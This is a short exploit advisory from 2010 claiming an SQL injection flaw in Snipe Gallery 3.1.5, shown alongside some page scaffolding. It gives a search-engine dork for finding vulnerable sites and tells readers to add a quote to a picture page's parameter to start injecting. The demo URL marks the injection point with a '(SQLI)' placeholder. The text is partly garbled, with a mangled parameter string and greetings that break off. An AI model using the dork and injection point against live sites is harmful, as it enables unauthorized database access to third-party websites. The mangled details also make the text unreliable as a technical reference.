33 lines
No EOL
786 B
Text
33 lines
No EOL
786 B
Text
# Exploit Title: snipe gallery Script Sql Injection
|
|
# Date: 26/06/2010
|
|
# Author: dev!l ghost
|
|
# Email: aws(at)live(dot)it
|
|
# Site : www.h00forall.com
|
|
# Script url: http://sourceforge.net/projects/snipegallery/
|
|
# Version: 3.1.5
|
|
# Tested on: Windows
|
|
# CVE : ()
|
|
|
|
:::::::::::::::::::::::::
|
|
|
|
|
|
=================Exploit=================
|
|
DorK:(Snipe Gallery v.3.1.5 by Snipe.Net)
|
|
|
|
When You search with the dork you will find a lot of sites ,,enter
|
|
site and you will find a lot of pictures enter any picture and
|
|
the pot the(')and start the inject
|
|
|
|
the inject is very easy
|
|
|
|
|
|
|
|
----exploit----
|
|
|
|
{{DeMo}}
|
|
http://www.example.com/snipe/image.php?page=1&search_type=and?_id=78(SQLI)
|
|
|
|
---------greatz----------
|
|
Greatz to all my frinds and the all muslims
|
|
and Volc4n0 and Golden Ice and mr.ip
|
|
and the all |